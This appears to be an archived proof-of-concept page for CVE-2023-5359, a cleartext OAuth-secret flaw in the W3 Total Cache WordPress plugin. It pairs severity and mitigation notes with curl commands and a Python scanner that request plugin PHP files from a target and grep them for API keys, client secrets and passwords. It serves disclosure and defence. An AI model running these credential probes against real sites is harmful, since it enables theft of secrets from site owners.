Related vulnerability
Title: WordPress plugin W3 Total Cache information disclosure vulnerability (CVE-2023-5359) POC
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets you host a personal blog on a server running PHP and MySQL; a WordPress plugin is an add-on application for it. W3 Total Cache 2.7.5 and earlier contain an information disclosure vulnerability caused by storing the Google OAuth API secret in plaintext. An attacker who exploits it can gain access to user account information.
POC description
CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Detect exposed credentials in W3 Total Cache plugin versions ≤ 2.7.5.
Introduction
# CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability
## Description
**CVE-2023-5359** is a cleartext storage vulnerability in the WordPress plugin **W3 Total Cache**, versions ≤ 2.7.5. The plugin's Google OAuth API secret is stored in plaintext in its PHP source, which is publicly distributed, so an unauthenticated remote attacker can read the secret and use it to gain access to user account information. The scanner in this repository additionally probes a target site for plugin PHP files whose source is served as text, which would expose any other credentials embedded in them.
## Severity
- **CVSS Score**: 7.5 (High)
- **Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Type**: Sensitive Information Exposure
## Technical Vulnerability
### Root Cause
W3 Total Cache ≤ 2.7.5 ships a Google OAuth API client secret in cleartext inside its PHP source under `/wp-content/plugins/w3-total-cache/`. Because the plugin package itself is public, the secret is readable by anyone; it is not a per-site value and no access to a particular target is needed to obtain it. Requesting the plugin's PHP files directly over HTTP normally executes them rather than returning source, so a target site only leaks additional material when its PHP handling is misconfigured and the files are served as text. On such a host the same files can expose:
- API keys (Cloudflare, Google, etc.)
- client secrets
- OAuth tokens
- external service credentials
### Files Probed by the Scanner
These are the plugin source files the manual commands and the script below request. The repository does not verify which of them hold a secret; on a correctly configured server each request executes the file instead of returning its source.
```
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php
```
## Exploitation
### Manual Method
```bash
# Check whether W3 Total Cache is installed (the plugin leaves its name in
# page markup and asset paths)
curl -s https://target.com/ | grep -i "w3-total-cache"

# Request a plugin source file directly. Caveat: a correctly configured host
# executes the .php file and returns its output (usually an empty page or a
# PHP error), not the source, so the grep only finds something when the
# server is misconfigured to serve raw PHP.
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Probe the other files the scanner checks
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
  echo "=== $file ==="
  curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done
```
### Automated Script
```python
#!/usr/bin/env python3
"""Probe W3 Total Cache source files for credential-looking assignments.
A correctly configured server executes these .php files and returns their
output, not their source; a hit here means PHP source is being served."""
import re
import sys
import requests

# Target from the command line, falling back to the README's placeholder
target = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php",
]
# Match key = 'value' or 'key' => 'value' assignments in PHP source
pattern = re.compile(r"(api_key|client_id|client_secret|password)['\"]?\s*(?:=>|=)\s*['\"]([^'\"]+)")
for file in files:
    try:
        response = requests.get(target + file, timeout=10)
    except requests.RequestException as exc:
        print(f"[-] {file}: request failed ({exc})")
        continue
    if response.status_code != 200 or "<?php" not in response.text:
        # 403/404 or executed output: no PHP source to search
        print(f"[-] {file}: HTTP {response.status_code}, no PHP source returned")
        continue
    credentials = pattern.findall(response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")
```
## Impact
With the plugin's Google OAuth client secret, an attacker can:
1. **Impersonate the plugin's OAuth client** and gain access to user account information, which is the impact described in the advisory
If a site additionally serves plugin PHP source as text, any credentials stored there are exposed as well:
2. **Cloudflare credentials** - take control of CDN and DNS settings
3. **API keys for external services** - access the linked external accounts
4. **OAuth tokens** - impersonate the site to those services
## Mitigation
### Immediate Solution
1. **Update** to W3 Total Cache 2.7.6 or later, the first release that no longer ships the secret in cleartext
2. **Restrict direct access** to PHP files in the plugin directory, so a PHP-handling misconfiguration cannot serve their source
3. **Revoke and regenerate** any site-specific credentials (Cloudflare and other service tokens) if plugin source was ever served; the Google OAuth secret itself belongs to the plugin vendor and is only addressed by the update
### Secure Configuration
```apache
# .htaccess in /wp-content/plugins/w3-total-cache/: deny direct requests for
# the plugin's PHP files (Apache 2.4 syntax; on Apache 2.2 use
# "Order deny,allow" + "Deny from all", since Deny/Allow without an Order
# directive are not applied as intended)
<Files "*.php">
    Require all denied
</Files>
<Files "w3-total-cache.php">
    Require all granted
</Files>
```
This only closes the source-disclosure path on a misconfigured host; it does not remove the secret from the plugin package, so it is a complement to the update, not a substitute. Test the site afterwards, because any plugin endpoint that expects direct requests to a PHP file in that directory will stop working under a blanket deny.
## Detection
### Verification Command
```bash
# Check the installed version. readme.txt is served as plain text and its
# "Stable tag" line names the packaged release; a direct request for
# w3-total-cache.php executes the file and does not return the header comment.
curl -s https://target.com/wp-content/plugins/w3-total-cache/readme.txt | grep -i "^Stable tag"
```
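As an added example (not code from this repository or from the W3 Total Cache project), the following Python triages the two things the detection step depends on: the `Stable tag` in readme.txt, compared against the 2.7.6 fixed version named under Mitigation, and whether a direct `.php` response is really PHP source (what the scanner's grep assumes) or executed output. The readme and response bodies are constructed samples, and the hypothetical `triage()` helper combines both checks into one result.

```python
#!/usr/bin/env python3
"""Offline triage helpers for CVE-2023-5359 scan results (added example)."""
import re
from typing import List, Optional, Tuple

# First W3 Total Cache release without the cleartext secret (from Mitigation)
FIXED_VERSION = (2, 7, 6)

# Constructed sample bodies, not captured from a real site
SAMPLE_README = (
    "=== W3 Total Cache ===\n"
    "Contributors: boldgrid\n"
    "Stable tag: 2.7.5\n"
    "License: GPLv2 or later\n"
)
SAMPLE_EXECUTED = "<br />\n<b>Fatal error</b>: Uncaught Error: Class not found"
SAMPLE_SOURCE = (
    "<?php\n$config = array(\n"
    "    'client_id' => 'example-id',\n"
    "    'client_secret' => 'example-secret',\n);\n"
)

def parse_version(text: str) -> Tuple[int, ...]:
    """'2.7.5' -> (2, 7, 5); ignores suffixes such as '-rc1'."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"not a version string: {text!r}")
    return tuple(int(p) for p in m.group(1).split("."))

def stable_tag(readme: str) -> Optional[str]:
    """Return the 'Stable tag:' value from a plugin readme.txt, or None."""
    m = re.search(r"^Stable tag:\s*(\S+)", readme, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None

def is_vulnerable_version(version: str) -> bool:
    """True for every release below 2.7.6, i.e. the affected range <= 2.7.5."""
    return parse_version(version) < FIXED_VERSION

def looks_like_php_source(body: str) -> bool:
    """Executed PHP never emits its own open tag, so '<?php' in the body
    means the server handed back the file as text."""
    return "<?php" in body

def extract_credentials(body: str) -> List[Tuple[str, str]]:
    """Same kind of pattern the README's scanner uses, but only applied to
    bodies that are real source so executed pages cannot yield false hits."""
    if not looks_like_php_source(body):
        return []
    pat = re.compile(
        r"""['"]?(api_key|client_id|client_secret|password)['"]?\s*(?:=>|=)\s*['"]([^'"]+)['"]"""
    )
    return pat.findall(body)

def triage(readme_body: str, php_body: str) -> dict:
    """Hypothetical helper: combine version and source-disclosure checks."""
    tag = stable_tag(readme_body)
    return {
        "version": tag,
        "vulnerable_version": bool(tag) and is_vulnerable_version(tag),
        "source_leaked": looks_like_php_source(php_body),
        "credentials": extract_credentials(php_body),
    }

if __name__ == "__main__":
    # A vulnerable version whose server executes PHP normally: update needed,
    # but nothing beyond the public plugin secret is exposed by this host
    print(triage(SAMPLE_README, SAMPLE_EXECUTED))
    # The same version on a host that serves source: credentials recovered
    print(triage(SAMPLE_README, SAMPLE_SOURCE))
```

The version check alone tells you whether the public Google OAuth secret applies to this install; the source check is what decides whether the grep-based steps above can return anything at all for this particular host.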
### Compromise Indicators
- Unusual activity in external APIs
- Changes in CloudFlare configurations
- Traffic from unauthorized IPs to connected services
## Example Finding
```
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
client_id: GAxxxxxxxxxxxx78
client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
```
## References
- [CVE-2023-5359](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5359)
- [W3 Total Cache Changelog](https://wordpress.org/plugins/w3-total-cache/#developers)
- [WordPress Security Team](https://wordpress.org/support/wordpress-version/version-security/)
## Legal Notice
This repository is for educational purposes and authorized penetration testing only. Malicious use of this information is strictly prohibited.
---
**Found this information useful?** Star the repository!
*Last updated: November 2025*
File snapshot
[4.0K] /data/pocs/8cc184ca3f82f8d828600fdf206a5e4f5fb7bd4a
├── [4.9K] poc.py
└── [4.0K] README.md
1 directory, 2 files
Notes
1. Prefer accessing the POC through its original source.
2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for or donating toward the local POC archive. Thank you for your support.